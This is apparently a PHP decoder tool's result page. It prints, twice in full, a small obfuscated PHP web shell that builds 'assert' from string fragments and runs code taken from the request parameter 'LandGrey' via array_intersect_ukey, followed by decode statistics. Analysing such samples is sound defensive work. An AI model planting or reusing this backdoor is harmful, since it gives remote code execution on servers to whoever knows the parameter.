Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Noticed: (PHP 5 >= 5.4.0, PHP 7) * */ $password = "LandGrey"; $ch = explode..

Decoded Output download

<?php
/**
 * Noticed: (PHP 5 >= 5.4.0, PHP 7)
 *
 */
$password = "LandGrey";
$ch = explode(".","hello.ass.world.er.t");
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch[1].$ch[3].$ch[4]);
?>

Did this file decode correctly?

Original Code

<?php
/**
 * Noticed: (PHP 5 >= 5.4.0, PHP 7)
 *
 */
$password = "LandGrey";
$ch = explode(".","hello.ass.world.er.t");
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch[1].$ch[3].$ch[4]);
?>

Function Calls

explode 1
array_intersect_ukey 1

Variables

$ch [{'key': None, 'value': 'hello'}, {'key': None, 'value': 'ass'}, {'key': None, 'value': 'world'}, {'key': None, 'value': 'er'}, {'key': None, 'value': 't'}]
$password LandGrey

Stats

MD5 0530a510d761963e417d40c9217c6435
Eval Count 0
Decode Time 94 ms